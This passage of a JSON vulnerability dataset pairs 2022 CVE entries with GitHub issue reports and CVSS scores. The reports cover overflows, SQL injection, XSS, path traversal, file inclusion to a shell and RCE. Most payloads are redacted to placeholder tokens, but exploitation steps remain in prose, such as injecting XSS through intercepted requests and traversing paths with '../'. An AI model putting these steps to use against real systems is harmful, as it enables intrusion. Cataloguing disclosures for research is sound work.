  80616. "CVE_ID": "CVE-2022-26125",
  80617. "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10507",
  80618. "Issue_Url_new": "https://github.com/frrouting/frr/issues/10507",
  80619. "Repo_new": "frrouting/frr",
  80620. "Issue_Created_At": "2022-02-06T03:32:58Z",
  80621. "description": "isisd: overflow bugs in unpack_tlv_router_cap. URLTAG There are a few issues in the loop above leading to overflow vulnerabilities. The loop condition is APITAG and APITAG is updated at the end of the loop APITAG NUMBERTAG APITAG ). The Issue on Loop Condition : at Line NUMBERTAG when we update APITAG , if APITAG , integer overflow will happen, leading to heap overflows in the next loop iteration. Other Issues : at Line NUMBERTAG Line NUMBERTAG Line NUMBERTAG Line NUMBERTAG and Line NUMBERTAG I think we need to use break instead of continue . Using continue will let us miss the update of the loop condition variable at Line NUMBERTAG Please check if my understanding of the code above is correct. If so, I can make a pull request to fix these issues then.",
  80622. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80623. "severity": "HIGH",
  80624. "baseScore": 7.8,
  80625. "impactScore": 5.9,
  80626. "exploitabilityScore": 1.8
  80627. },
  80628. {
  80629. "CVE_ID": "CVE-2022-26126",
  80630. "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10505",
  80631. "Issue_Url_new": "https://github.com/frrouting/frr/issues/10505",
  80632. "Repo_new": "frrouting/frr",
  80633. "Issue_Created_At": "2022-02-05T05:11:16Z",
  80634. "description": "isisd: misusing strdup leads to stack overflow. At Line NUMBERTAG in the code below, we call APITAG , which will further call APITAG . However, APITAG is not guaranteed to be a zero terminated string and, thus, will lead to a stack overflow in strdup . When I set APITAG to APITAG , then the bug disappears. Note that strdup should be used with a C string. In the same file, APITAG , there are NUMBERTAG places where APITAG are called on APITAG and, thus, the overflow may happen. Please check and suggest a fix. I can give a pull request then. URLTAG What follows is the output of the address sanitizer: ERRORTAG",
  80635. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80636. "severity": "HIGH",
  80637. "baseScore": 7.8,
  80638. "impactScore": 5.9,
  80639. "exploitabilityScore": 1.8
  80640. },
  80641. {
  80642. "CVE_ID": "CVE-2022-26128",
  80643. "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10502",
  80644. "Issue_Url_new": "https://github.com/frrouting/frr/issues/10502",
  80645. "Repo_new": "frrouting/frr",
  80646. "Issue_Created_At": "2022-02-04T18:10:06Z",
  80647. "description": "An incorrect check on length in babeld. The check at Line NUMBERTAG is not correct. It should be APITAG because len does not include the first two bytes, i.e., APITAG and APITAG URLTAG",
  80648. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80649. "severity": "HIGH",
  80650. "baseScore": 7.8,
  80651. "impactScore": 5.9,
  80652. "exploitabilityScore": 1.8
  80653. },
  80654. {
  80655. "CVE_ID": "CVE-2022-26129",
  80656. "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10503",
  80657. "Issue_Url_new": "https://github.com/frrouting/frr/issues/10503",
  80658. "Repo_new": "frrouting/frr",
  80659. "Issue_Created_At": "2022-02-04T21:17:08Z",
  80660. "description": "babeld: bugs in parse_hello_subtlv, parse_ihu_subtlv, and parse_update_subtlv. URLTAG Line NUMBERTAG the condition should be APITAG instead of APITAG . Otherwise, overflows will happen at NUMBERTAG Line NUMBERTAG the condition should be APITAG instead of APITAG . We need include extra two bytes, a[i] and a[i NUMBERTAG in this check.",
  80661. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80662. "severity": "HIGH",
  80663. "baseScore": 7.8,
  80664. "impactScore": 5.9,
  80665. "exploitabilityScore": 1.8
  80666. },
  80667. {
  80668. "CVE_ID": "CVE-2022-26174",
  80669. "Issue_Url_old": "https://github.com/beekeeper-studio/beekeeper-studio/issues/1051",
  80670. "Issue_Url_new": "https://github.com/beekeeper-studio/beekeeper-studio/issues/1051",
  80671. "Repo_new": "beekeeper-studio/beekeeper-studio",
  80672. "Issue_Created_At": "2022-02-21T07:24:12Z",
  80673. "description": "RCE Vulnerability in Beekeeper Studio. author: Gqliang MENTIONTAG Date NUMBERTAG Display fields are not filtered allowing arbitrary code to be inserted eg: FILETAG We can fake a MYSQL server so that any SQL statement executed when the user connects will execute the remote code we expect exp: FILETAG run this exp program eg : FILETAG As long as you execute any SELECT query on the program, the vulnerability will be triggered to execute arbitrary remote code. Of course it's not just that. eg: FILETAG",
  80674. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80675. "severity": "CRITICAL",
  80676. "baseScore": 9.8,
  80677. "impactScore": 5.9,
  80678. "exploitabilityScore": 3.9
  80679. },
  80680. {
  80681. "CVE_ID": "CVE-2022-26181",
  80682. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/154",
  80683. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/154",
  80684. "Repo_new": "dropbox/lepton",
  80685. "Issue_Created_At": "2022-02-21T11:00:57Z",
  80686. "description": "Bug]A heap buffer overflow was discovered in function APITAG PATHTAG Description A heap buffer overflow was discovered in function APITAG PATHTAG The issue is being triggered in function APITAG PATHTAG Version lepton NUMBERTAG g2a NUMBERTAG b NUMBERTAG APITAG Commit) url: URLTAG Reproduce ERRORTAG POC poc file attached. ASAN Report ERRORTAG Occurrences [bitops.cc L NUMBERTAG L NUMBERTAG URLTAG References attached files URLTAG Contact me Any issue or problem plz contact with me. EMAILTAG Tweet. MENTIONTAG",
  80687. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  80688. "severity": "HIGH",
  80689. "baseScore": 7.8,
  80690. "impactScore": 5.9,
  80691. "exploitabilityScore": 1.8
  80692. },
  80693. {
  80694. "CVE_ID": "CVE-2022-26198",
  80695. "Issue_Url_old": "https://github.com/notable/notable/issues/1595",
  80696. "Issue_Url_new": "https://github.com/notable/notable/issues/1595",
  80697. "Repo_new": "notable/notable",
  80698. "Issue_Created_At": "2022-02-22T06:54:26Z",
  80699. "description": "RCE Vulnerability in Notable. author: APITAG MENTIONTAG Date NUMBERTAG Text editing without filtering leads to arbitrary code execution Payload\uff1a ERRORTAG eg. FILETAG",
  80700. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80701. "severity": "CRITICAL",
  80702. "baseScore": 9.8,
  80703. "impactScore": 5.9,
  80704. "exploitabilityScore": 3.9
  80705. },
  80706. {
  80707. "CVE_ID": "CVE-2022-26244",
  80708. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/23",
  80709. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/23",
  80710. "Repo_new": "kishan0725/hospital-management-system",
  80711. "Issue_Created_At": "2022-03-29T09:38:55Z",
  80712. "description": "Persistent cross site scripting (XSS) in targeted towards web admin through FILETAG at via the parameter \"special\".. Add Doctor info payload to Doctor Special of Add Doctor page to target FILETAG , then use burpsuite get requests datas, change the 'special' parameter to xss payload: APITAG alert NUMBERTAG APITAG Step to exploit NUMBERTAG Navigate to FILETAG NUMBERTAG Click APITAG Doctors ', use burpsuite to insert xss payload in the \"special\" parameter NUMBERTAG Click APITAG Doctors\" FILETAG FILETAG Proof of concept APITAG APITAG alert NUMBERTAG APITAG",
  80713. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  80714. "severity": "MEDIUM",
  80715. "baseScore": 5.4,
  80716. "impactScore": 2.7,
  80717. "exploitabilityScore": 2.3
  80718. },
  80719. {
  80720. "CVE_ID": "CVE-2022-26245",
  80721. "Issue_Url_old": "https://github.com/open-falcon/falcon-plus/issues/951",
  80722. "Issue_Url_new": "https://github.com/open-falcon/falcon-plus/issues/951",
  80723. "Repo_new": "open-falcon/falcon-plus",
  80724. "Issue_Created_At": "2022-02-23T07:08:36Z",
  80725. "description": "report sqlinjection vulnerability. sqlinjection source PATHTAG line NUMBERTAG CODETAG sqlinjection sink http param is APITAG PATHTAG line NUMBERTAG ERRORTAG // provide sqlinjection bool True page FILETAG sqlinjection bool False page FILETAG FILETAG",
  80726. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80727. "severity": "CRITICAL",
  80728. "baseScore": 9.8,
  80729. "impactScore": 5.9,
  80730. "exploitabilityScore": 3.9
  80731. },
  80732. {
  80733. "CVE_ID": "CVE-2022-26247",
  80734. "Issue_Url_old": "https://github.com/xiweicheng/tms/issues/16",
  80735. "Issue_Url_new": "https://github.com/xiweicheng/tms/issues/16",
  80736. "Repo_new": "xiweicheng/tms",
  80737. "Issue_Created_At": "2022-02-24T02:13:47Z",
  80738. "description": "There is a Insecure Permissions vulnerability exists in tms. FILETAG NUMBERTAG In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password NUMBERTAG FILETAG Now I log in to the test account to try to change the information and password of the admin account. APITAG the user icon in the upper right corner and select Modify in the drop down box to open the modify personal information pop up window. FILETAG FILETAG APITAG there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change NUMBERTAG in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent > click the confirm submit button. FILETAG APITAG the packet capture data, as shown in the following figure. FILETAG APITAG forwad to finish the modification. FILETAG The information of viewing admin has APITAG recurrence completed. FILETAG",
  80739. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  80740. "severity": "MEDIUM",
  80741. "baseScore": 5.9,
  80742. "impactScore": 3.6,
  80743. "exploitabilityScore": 2.2
  80744. },
  80745. {
  80746. "CVE_ID": "CVE-2022-26255",
  80747. "Issue_Url_old": "https://github.com/Fndroid/clash_for_windows_pkg/issues/2710",
  80748. "Issue_Url_new": "https://github.com/fndroid/clash_for_windows_pkg/issues/2710",
  80749. "Repo_new": "fndroid/clash_for_windows_pkg",
  80750. "Issue_Created_At": "2022-02-23T14:53:55Z",
  80751. "description": "APITAG Remote Code Execution NUMBERTAG Windows NUMBERTAG Windows NUMBERTAG APITAG I found a vulnerability in the clash_for_windows_pkg client that only needs a link to exploit \u590d\u73b0\u6b65\u9aa4 \u8fd9\u4e2a\u6f0f\u6d1e\u5371\u5bb3\u5f88\u5927\uff0c\u4e14\u6781\u5176\u5bb9\u6613\u5229\u7528\uff0c\u6211\u4e0d\u60f3\u5728\u4ed6\u88ab\u4fee\u590d\u4e4b\u524d\u516c\u5f00 This vulnerability is harmful and easy to exploit, I don't want to make it public until it is fixed",
  80752. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80753. "severity": "CRITICAL",
  80754. "baseScore": 9.8,
  80755. "impactScore": 5.9,
  80756. "exploitabilityScore": 3.9
  80757. },
  80758. {
  80759. "CVE_ID": "CVE-2022-26260",
  80760. "Issue_Url_old": "https://github.com/wollardj/simple-plist/issues/60",
  80761. "Issue_Url_new": "https://github.com/wollardj/simple-plist/issues/60",
  80762. "Repo_new": "wollardj/simple-plist",
  80763. "Issue_Created_At": "2022-02-23T19:46:47Z",
  80764. "description": "Prototype Pollution using APITAG Hi, There's a prototype pollution vulnerability in APITAG related to the xml that are being parsed in it. In the following example the prototype pollution will affect the length parameter. ERRORTAG More information about the vulnerability: FILETAG",
  80765. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80766. "severity": "CRITICAL",
  80767. "baseScore": 9.8,
  80768. "impactScore": 5.9,
  80769. "exploitabilityScore": 3.9
  80770. },
  80771. {
  80772. "CVE_ID": "CVE-2022-26268",
  80773. "Issue_Url_old": "https://github.com/hiliqi/xiaohuanxiong/issues/33",
  80774. "Issue_Url_new": "https://github.com/hiliqi/xiaohuanxiong/issues/33",
  80775. "Repo_new": "hiliqi/xiaohuanxiong",
  80776. "Issue_Created_At": "2022-02-11T02:54:01Z",
  80777. "description": "\u6f2b\u753bcms\u524d\u53f0\u5b58\u5728sql\u6ce8\u5165. FILETAG \u6f2b\u753b\u8be6\u60c5\u63a5\u53e3\u7684id\u53c2\u6570\u5b58\u5728sql\u6ce8\u5165 PATHTAG \u8fd9\u91cc\u83b7\u53d6\u53c2\u6570\u662fid FILETAG APITAG FILETAG",
  80778. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80779. "severity": "CRITICAL",
  80780. "baseScore": 9.8,
  80781. "impactScore": 5.9,
  80782. "exploitabilityScore": 3.9
  80783. },
  80784. {
  80785. "CVE_ID": "CVE-2022-26271",
  80786. "Issue_Url_old": "https://github.com/N1ce759/74cmsSE-Arbitrary-File-Reading/issues/1",
  80787. "Issue_Url_new": "https://github.com/n1ce759/74cmsse-arbitrary-file-reading/issues/1",
  80788. "Repo_new": "n1ce759/74cmsse-arbitrary-file-reading",
  80789. "Issue_Created_At": "2022-02-24T08:36:32Z",
  80790. "description": "APITAG Arbitrary File Read Vulnerability. Vulnerability Name: Arbitrary File Read Date of Discovery: PATHTAG Product version\uff1a APITAG APITAG : FILETAG Author: N1ce Vulnerability Description: The function is not verified or fails to be verified. The user can control the variable to read any file Code Analysis In PATHTAG , at line NUMBERTAG there is a file manipulation function where the $url is a parameter that the user can control and is not filtered, and $ourput_filename is the filename to be output FILETAG From this, we can build parameters: PATHTAG Prove Read the web site database configuration file. PS: I used FILETAG because I didn't configure Apache pseudo static FILETAG FILETAG Reading server files FILETAG FILETAG",
  80791. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  80792. "severity": "HIGH",
  80793. "baseScore": 7.5,
  80794. "impactScore": 3.6,
  80795. "exploitabilityScore": 3.9
  80796. },
  80797. {
  80798. "CVE_ID": "CVE-2022-26272",
  80799. "Issue_Url_old": "https://github.com/ionize/ionize/issues/403",
  80800. "Issue_Url_new": "https://github.com/ionize/ionize/issues/403",
  80801. "Repo_new": "ionize/ionize",
  80802. "Issue_Created_At": "2022-02-24T09:07:23Z",
  80803. "description": "RCE exists in Ionize NUMBERTAG PATHTAG file L NUMBERTAG The APITAG Key\" parameter of the installation page uri PATHTAG is not strictly filtered, and any string can be written to the PATHTAG file, resulting in arbitrary code execution. Vulnerability reason write configuration file directly without filtering Where the vulnerability occurs: URLTAG FILETAG Vulnerability Demo When installing to user settings, the value of the Encryption Key will be written to the configuration file PATHTAG FILETAG payload: APITAG Enter payload to submit FILETAG Ok, the payload has been successfully written into FILETAG try command execution FILETAG Bugfix Only letters and numbers are allowed, no other characters are allowed",
  80804. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80805. "severity": "CRITICAL",
  80806. "baseScore": 9.8,
  80807. "impactScore": 5.9,
  80808. "exploitabilityScore": 3.9
  80809. },
  80810. {
  80811. "CVE_ID": "CVE-2022-26276",
  80812. "Issue_Url_old": "https://github.com/helloxz/onenav/issues/44",
  80813. "Issue_Url_new": "https://github.com/helloxz/onenav/issues/44",
  80814. "Repo_new": "helloxz/onenav",
  80815. "Issue_Created_At": "2022-02-25T06:00:26Z",
  80816. "description": "APITAG has directory traversal with file inclusion that can lead to Getshell. \u6f0f\u6d1e\u7b80\u4ecb Vulnerability Introduction \u7531\u4e8e FILETAG APITAG \u6f0f\u6d1e\u5206\u6790 Vulnerability analysis \u5b58\u5728\u6f0f\u6d1e\u4ee3\u7801\uff1a Vulnerable codes\uff1a FILETAG CODETAG APITAG APITAG \uff0c\u7136\u540e\u62fc\u63a5\u540e\u8fdb\u884c\u6587\u4ef6\u5305\u542b\u3002 As shown below, the user controllable and unfiltered parameter APITAG exists in APITAG which is then spliced for file inclusion. FILETAG \u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u5f62\u5982 APITAG \u6765\u5229\u7528php\u539f\u751f\u7684 APITAG \u6587\u4ef6\u4e0b\u8f7d\u6076\u610f\u6587\u4ef6\u3002 APITAG We can use a payload shaped like xxx to download malicious files using the php native APITAG file. FILETAG content: (if you have a php environment, use echo output, if you don't have a php environment, the content is just malicious code) APITAG APITAG The request will download the php file containing the malicious code within the server and output the path, and then use the path to traverse the path containing the malicious file to Getshell. \u6f0f\u6d1e\u590d\u73b0 Vulnerability Reproduction APITAG APITAG APITAG \uff0c\u8fd9\u4e2a\u76ee\u5f55\u4e0b\u5c31\u6709\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u7684 APITAG \u3002 \u6211\u4eec\u5f00\u542f\u4e00\u4e2a APITAG \u5b98\u65b9docker\u955c\u50cf\u641c\u7d22\uff0c\u53ef\u4ee5\u770b\u5230 APITAG \u6240\u5728\u4f4d\u7f6e\uff1a The complete environment of php will contain pecl, which is a command line tool used in PHP to manage extensions, and pear, which is a class library that pecl depends on. In any version of the Docker image, pcel/pear is installed by default in APITAG , and this directory contains APITAG , which we can use. We open a APITAG official docker image to search for it, and we can see where APITAG is located. FILETAG \u4f7f\u7528\u5b9d\u5854\uff08 FILETAG \uff09\u642d\u5efa\u7f51\u7ad9\u4e5f\u4f1a\u5b58\u5728\uff1a Building a website using Baota ( FILETAG can also present. FILETAG Mac\u73af\u5883\u4e0b\u4f7f\u7528MAMP\u5efa\u7ad9\u4e5f\u4f1a\u542b\u6709 APITAG \u6587\u4ef6\uff1a A Mac environment built with MAMP will also contain the APITAG file. FILETAG \u8fd9\u91cc\u6211\u4f7f\u7528\u5b98\u65b9docker APITAG \u505a\u6f14\u793a\uff0c Dockerfile \u4e0b\u8f7d\u5730\u5740\uff1a URLTAG \u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8def\u5f84\u7a7f\u8d8a\u5305\u542b APITAG \uff0c\u4f20\u5165\u4e0b\u8f7d\u6587\u4ef6\u7684payload\uff0c\u4e0b\u8f7d\u6076\u610f\u6587\u4ef6\u5230\u670d\u52a1\u5668\u3002 Here I use the official docker APITAG for a demo, Dockerfile download address: URLTAG So we can download the malicious file to the server by path traversal containing APITAG and passing in the payload of the downloaded file. APITAG FILETAG APITAG Then go ahead and include the malicious files to Getshell. APITAG FILETAG \u5176\u4ed6 \u5173\u4e8e APITAG \u7684\u8be6\u7ec6\u5229\u7528\u63cf\u8ff0\u53ef\u4ee5\u53c2\u8003p\u725b\u7684\u6587\u7ae0\uff1a FILETAG",
  80817. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  80818. "severity": "MEDIUM",
  80819. "baseScore": 5.3,
  80820. "impactScore": 1.4,
  80821. "exploitabilityScore": 3.9
  80822. },
  80823. {
  80824. "CVE_ID": "CVE-2022-26279",
  80825. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/22",
  80826. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/22",
  80827. "Repo_new": "weng-xianhu/eyoucms",
  80828. "Issue_Created_At": "2022-02-25T02:20:46Z",
  80829. "description": "Database backup Download . Author: A NUMBERTAG Submit date: PATHTAG Target: FILETAG APITAG NUMBERTAG UTF8 SP NUMBERTAG FILETAG APITAG /data/sqldata directory has no access restrictions. You can download it by building an absolute path, in which NUMBERTAG SQL) (yyyy / DD / h / min / S backup times version. SQL) constructs batch fuzzy tests through scripts APITAG Background backup FILETAG Path FILETAG APITAG Batch fuzz test through script",
  80830. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80831. "severity": "CRITICAL",
  80832. "baseScore": 9.8,
  80833. "impactScore": 5.9,
  80834. "exploitabilityScore": 3.9
  80835. },
  80836. {
  80837. "CVE_ID": "CVE-2022-26280",
  80838. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1672",
  80839. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1672",
  80840. "Repo_new": "libarchive/libarchive",
  80841. "Issue_Created_At": "2022-02-25T08:52:19Z",
  80842. "description": "The libarchive lib exist a READ memory access Vulnerability. hello,when i write code to call archive_read_data function,i find a READ memory access Vulnerability.see the picture! FILETAG",
  80843. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
  80844. "severity": "MEDIUM",
  80845. "baseScore": 6.5,
  80846. "impactScore": 4.2,
  80847. "exploitabilityScore": 2.2
  80848. },
  80849. {
  80850. "CVE_ID": "CVE-2022-26291",
  80851. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/206",
  80852. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/206",
  80853. "Repo_new": "ckolivas/lrzip",
  80854. "Issue_Created_At": "2021-08-02T11:46:06Z",
  80855. "description": "Multiple concurrency UAF bug between APITAG and APITAG function. Dear all, Our tool report that there would be multiple concurrency use after free between APITAG function and APITAG function, in the newest master branch NUMBERTAG afe8. Brief Explanation The related code simplified from APITAG and ERRORTAG are shown as follow: ERRORTAG Both thread T0 and thread T1 operate on a shared variable ucthread (i.e., T0 dealloc the a ucthread through APITAG , and T1 use the ucthread in all statements ERRORTAG , APITAG , and APITAG ). However, a use after free can occur if the deallocation of ucthread before the use of ucthread. For example, the following three thread interleaving can trigger three different UAFs: Interleaving (a) ERRORTAG Interleaving (b) ERRORTAG Interleaving (c) ERRORTAG Reproduce through delay injection To reproduce those use after free errors, we can insert two delays (e.g., APITAG ) into the original source code. For example, to reproduce interleaving (a) as mentioned earlier, you can insert a delay before APITAG statement in function in APITAG , and also a delay after, as shown as follows. ERRORTAG FILETAG compile the program: APITAG Download the testcase (I upload the POC here, please unzip first). FILETAG Run with the testcase with the following command: APITAG Then, you will see the use after free bug report. Here is the trace reported by ASAN: ERRORTAG I'm not sure if these use after free bugs could cause serious harm. I hope you can check whether it is necessary to fix these bugs. Thanks.",
  80856. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  80857. "severity": "MEDIUM",
  80858. "baseScore": 5.5,
  80859. "impactScore": 3.6,
  80860. "exploitabilityScore": 1.8
  80861. },
  80862. {
  80863. "CVE_ID": "CVE-2022-26296",
  80864. "Issue_Url_old": "https://github.com/riscv-boom/riscv-boom/issues/577",
  80865. "Issue_Url_new": "https://github.com/riscv-boom/riscv-boom/issues/577",
  80866. "Repo_new": "riscv-boom/riscv-boom",
  80867. "Issue_Created_At": "2021-11-09T00:36:07Z",
  80868. "description": "New transient execution attack on Boom.. APITAG Type of issue : bug report APITAG APITAG Impact : rtl refactoring APITAG Development Phase : proposal Hi, I found a new transient execution attack on risc v boom. The attack relies on the bug NUMBERTAG which is a performance bug originally. But the same bug can also be used to transiently poison the BIM table using a transiently accessed secret. The attached APITAG attack is a Meltdown type of attack where a supervisor mode software transiently leaks a secret from the machine mode software (i.e., either a firmware or an enclave). The attack is based on two vulnerabilities NUMBERTAG boom transiently executes load instruction before checking PMP violation , and NUMBERTAG BIM table can be transiently updated using the accessed value . The attack is quite slow than using D cache as a side channel, but it still works and almost correctly retrieves the secret value (i.e NUMBERTAG deadbeef ). Used boom commit: d NUMBERTAG c2c3f How to reproduce the attack: APITAG This can be mitigated by fixing either one of two bugs above. FILETAG",
  80869. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  80870. "severity": "MEDIUM",
  80871. "baseScore": 5.5,
  80872. "impactScore": 3.6,
  80873. "exploitabilityScore": 1.8
  80874. },
  80875. {
  80876. "CVE_ID": "CVE-2022-26301",
  80877. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/11",
  80878. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/11",
  80879. "Repo_new": "yeyinshi/tuzicms",
  80880. "Issue_Created_At": "2022-02-28T02:50:16Z",
  80881. "description": "PATHTAG has APITAG PATHTAG line NUMBERTAG public function APITAG { //\u67e5\u8be2\u6307\u5b9aid\u7684\u680f\u76ee\u4fe1\u606f APITAG APITAG >where(\"id=$id\") APITAG POC: URLTAG",
  80882. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80883. "severity": "CRITICAL",
  80884. "baseScore": 9.8,
  80885. "impactScore": 5.9,
  80886. "exploitabilityScore": 3.9
  80887. },
  80888. {
  80889. "CVE_ID": "CVE-2022-26315",
  80890. "Issue_Url_old": "https://github.com/claudiodangelis/qrcp/issues/223",
  80891. "Issue_Url_new": "https://github.com/claudiodangelis/qrcp/issues/223",
  80892. "Repo_new": "claudiodangelis/qrcp",
  80893. "Issue_Created_At": "2022-02-28T14:59:45Z",
  80894. "description": "Directory Traversal Vulnerability. While qrcp works on receive mode, uploader can edit the file name in HTTP request and add \"../\". Meanwhile, qrcp doesn't check legality of file name which lead to directory traversal. Env: qrcp NUMBERTAG Windows NUMBERTAG Ubuntu NUMBERTAG Poc: APITAG APITAG APITAG credit: starryloki,lu0sf",
  80895. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  80896. "severity": "MEDIUM",
  80897. "baseScore": 5.3,
  80898. "impactScore": 1.4,
  80899. "exploitabilityScore": 3.9
  80900. },
  80901. {
  80902. "CVE_ID": "CVE-2022-26533",
  80903. "Issue_Url_old": "https://github.com/Xhofe/alist/issues/645",
  80904. "Issue_Url_new": "https://github.com/alist-org/alist/issues/645",
  80905. "Repo_new": "alist-org/alist",
  80906. "Issue_Created_At": "2022-03-01T03:38:23Z",
  80907. "description": "Alist has Cross Site Scripting (XSS) vulnerability. Alist Version / Alist NUMBERTAG Describe the bug / \u95ee\u9898\u63cf\u8ff0 Vulnerability Introduction A route in Alist that uses user inputted parameters when displaying xml files and does not filter them can cause xss. Vulnerability affects version NUMBERTAG ulnerability Analysis A new route was added in Alist NUMBERTAG APITAG , which allows users to control the data parameter in path. FILETAG Simplified code: ERRORTAG The incoming data is decoded by replacing (recovering the original base NUMBERTAG encoded url conflict characters), and then the parameter u is directly spliced and output to the page, so we can use this to construct the xss payload. APITAG The paylod is base NUMBERTAG encoded as follows: APITAG Replace APITAG with APITAG , then splice in the path: APITAG Vulnerability Exploitation After a successful local exploit, try using the official demo site to test: FILETAG Reproduction / \u590d\u73b0\u94fe\u63a5 URLTAG \u65e5\u5fd7 / Logs _No response_",
  80908. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  80909. "severity": "MEDIUM",
  80910. "baseScore": 6.1,
  80911. "impactScore": 2.7,
  80912. "exploitabilityScore": 2.8
  80913. },
  80914. {
  80915. "CVE_ID": "CVE-2022-26534",
  80916. "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2211",
  80917. "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2211",
  80918. "Repo_new": "fisco-bcos/fisco-bcos",
  80919. "Issue_Created_At": "2022-03-01T11:02:17Z",
  80920. "description": "The nodes change view frequently and stop generating blocks.. Describe the bug I start a chain with NUMBERTAG nodes, one of the nodes is a malicious one. It will change the value of some fields of a message. After starting the group, I started the stress testing program. And the program stuck. The log shows that the nodes stop producing new blocks and keep view changing. To Reproduce Steps to reproduce the behavior NUMBERTAG Start a chain with NUMBERTAG nodes NUMBERTAG Start the stress testing program NUMBERTAG The error occurs Expected behavior Nodes produce the blocks normally. Screenshots The stress testing program stuck here NUMBERTAG of the transactions are received) APITAG Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG rc2 (master branch) Additional context The log files: FILETAG",
  80921. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  80922. "severity": "HIGH",
  80923. "baseScore": 7.5,
  80924. "impactScore": 3.6,
  80925. "exploitabilityScore": 3.9
  80926. },
  80927. {
  80928. "CVE_ID": "CVE-2022-26565",
  80929. "Issue_Url_old": "https://github.com/totaljs/cms/issues/35",
  80930. "Issue_Url_new": "https://github.com/totaljs/cms/issues/35",
  80931. "Repo_new": "totaljs/cms",
  80932. "Issue_Created_At": "2022-02-27T06:16:08Z",
  80933. "description": "Security Issue Cross Site Scripting APITAG Description APITAG ERRORTAG Hello APITAG I report the security issue. When the administrator creates a page, the page is created by inserting XSS APITAG as the name of the page, and the script is executed when going to the page list. APITAG If you want to check the this, go to here URLTAG and login as above account.",
  80934. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  80935. "severity": "MEDIUM",
  80936. "baseScore": 4.8,
  80937. "impactScore": 2.7,
  80938. "exploitabilityScore": 1.7
  80939. },
  80940. {
  80941. "CVE_ID": "CVE-2022-26573",
  80942. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/840",
  80943. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/840",
  80944. "Repo_new": "magicblack/maccms10",
  80945. "Issue_Created_At": "2022-03-02T05:24:33Z",
